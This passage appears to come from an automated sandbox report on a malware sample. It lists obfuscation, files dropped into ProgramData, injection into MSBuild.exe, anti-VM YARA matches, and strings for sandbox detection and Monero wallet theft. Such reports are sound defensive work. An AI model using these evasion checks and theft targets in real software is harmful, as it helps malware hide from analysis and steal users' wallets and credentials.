ddress,GetProcAddress,

3_2_00418A63

PE file contains sections with non-standard names

Source: sql[1].dll.3.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.3.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.3.dr	Static PE information: section name: .00cfg
Source: msvcp140[1].dll.3.dr	Static PE information: section name: .didat
Source: softokn3[1].dll.3.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.3.dr	Static PE information: section name: .00cfg
Source: freebl3.dll.3.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.3.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.3.dr	Static PE information: section name: .didat
Source: softokn3.dll.3.dr	Static PE information: section name: .00cfg
Source: nss3.dll.3.dr	Static PE information: section name: .00cfg

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Code function: 0_2_008F71AD push ecx; ret	0_2_008F71C0
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Code function: 0_2_0094C13A push ecx; ret	0_2_0094C14D
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Code function: 0_2_0094C2D8 push ds; retn 0003h	0_2_0094C38D
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Code function: 0_2_0094C39E push ds; retn 0003h	0_2_0094C38D
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Code function: 0_2_0094C454 push ds; retf 0003h	0_2_0094C455
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Code function: 0_2_0094E9ED push 0000004Ch; iretd	0_2_0094E9FE
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Code function: 0_2_0093ADAD push ecx; ret	0_2_0093ADC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_0042F262 push ecx; ret	3_2_0042F275
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_00422E59 push esi; ret	3_2_00422E5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_0041DED5 push ecx; ret	3_2_0041DEE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_00432715 push 0000004Ch; iretd	3_2_00432726
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CBDB536 push ecx; ret	3_2_6CBDB549
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 10_2_00D071AD push ecx; ret	10_2_00D071C0

Drops PE files

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\KEGIDHJKKJ.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vcruntime140[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\sql[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\a43486128347[1].exe	Jump to dropped file

Drops PE files to the application program directory (C:\ProgramData)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\KEGIDHJKKJ.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

3_2_00418A63

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: 0.2.f1r6P3j3g7.exe.91dad8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.MSBuild.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.MSBuild.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.f1r6P3j3g7.exe.91dad8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.f1r6P3j3g7.exe.8f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1815003832.000000000091D000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2174458155.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: f1r6P3j3g7.exe PID: 6532, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 6628, type: MEMORYSTR

Country aware sample found (crashes after keyboard check)

Source: c:\users\user\desktop\f1r6p3j3g7.exe

Event Logs and Signature results: Application crash and keyboard check

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: f1r6P3j3g7.exe, MSBuild.exe	Binary or memory string: DIR_WATCH.DLL
Source: f1r6P3j3g7.exe, MSBuild.exe	Binary or memory string: SBIEDLL.DLL
Source: f1r6P3j3g7.exe, MSBuild.exe	Binary or memory string: API_LOG.DLL
Source: MSBuild.exe, 00000003.00000002.2174458155.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: INMPM20IXQUGN9:-?5(\C!7%{->^WALLET_PATHSOFTWARE\MONERO-PROJECT\MONERO-CORE.KEYS\MONERO\WALLET.KEYS\\\.\\...\\\\\\\\\\\\HAL9THJOHNDOEDISPLAYAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL16:07:4216:07:4216:07:4216:07:4216:07:4216:07:42DELAYS.TMP%S%SNTDLL.DLL

Contains functionality to detect sandboxes (mouse cursor move detection)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: OpenInputDesktop,SetThreadDesktop,GetCursorPos,GetCursorPos,Sleep,Sleep,GetCursorPos,Sleep,Sleep,GetCursorPos,

3_2_0040180D

Found dropped PE file which has not been started or loaded

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vcruntime140[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\sql[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Found large amount of non-executed APIs

Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	API coverage: 4.0 %
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	API coverage: 6.7 %
Source: C:\ProgramData\KEGIDHJKKJ.exe	API coverage: 4.2 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6984	Thread sleep time: -60000s >= -30000s			Jump to behavior
